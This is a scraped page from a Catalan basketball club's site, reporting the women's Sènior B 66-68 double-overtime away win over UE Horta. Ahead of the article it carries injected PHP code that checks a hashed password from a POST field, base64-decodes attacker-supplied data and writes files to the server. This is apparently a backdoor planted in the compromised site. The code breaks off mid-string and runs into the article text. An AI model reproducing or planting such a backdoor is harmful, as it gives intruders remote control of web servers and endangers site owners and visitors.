function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Sènior B sobreviu a un partit inacabable (66-68) - Tgn Bàsquet Club -

El Sènior B sobreviu a un partit inacabable (66-68)

Updated: novembre 17, 2023

El passat dissabte el sènior B es va enfrontar contra l’UE Horta a domicili, amb victòria final per a les liles per 66-68 després de 2 pròrrogues.

El partit va començar amb un intercanvi de cistelles entre els 2 equips. Les locals arribaven al matx amb un balanç de 3-3, mentre que les liles volien seguir amb la bona dinàmica de resultats que les feia situar-se a la part alta de la classificació (5-1). Al final del primer periode, el marcador reflexava un 16-17 favorable a les tarragonines. Al 2n quart, les locals van sortir més endollades i van agafar el liderat del partit, marxant al descans amb 3 punts d’aventatge: 32-29.

Després de la sortida de vestuaris, la dinàmica va seguir sent favorables a les barcelonines, que amagaven amb trencar el partit gràcies al seu alt nivell defensiu, que va col·lapsar l’atac lila. El 47-38 al final del 3r periode semblava que podia ser definitiu, però les liles van deixar-ho tot a l’últim quart, pujant la intensitat defensiva i fluint millor el joc d’atac. Un parcial de 0-5 en els últims 2 minuts de partit va igualar el matx, enviant-lo a la 1a pròrroga.

Els primers 5 minuts extra es van fer llargs. Es va notar el cansanci acumulat entre els equips i els nervis van fer que baixés l’anotació. Novament, una cistella de les liles en els últims segons va enviar el partit a la 2a pròrroga, on les tarragonines van tenir més sang freda i van poder definir millor per emportar-se una important victòria a domicili.

Aquest dissabte vinent, les nostres sèniors rebran la visita del Lluïsos de Gràcia B (equip imbatut) i intentaran continuar amb aquesta bona dinàmica de joc i resultats.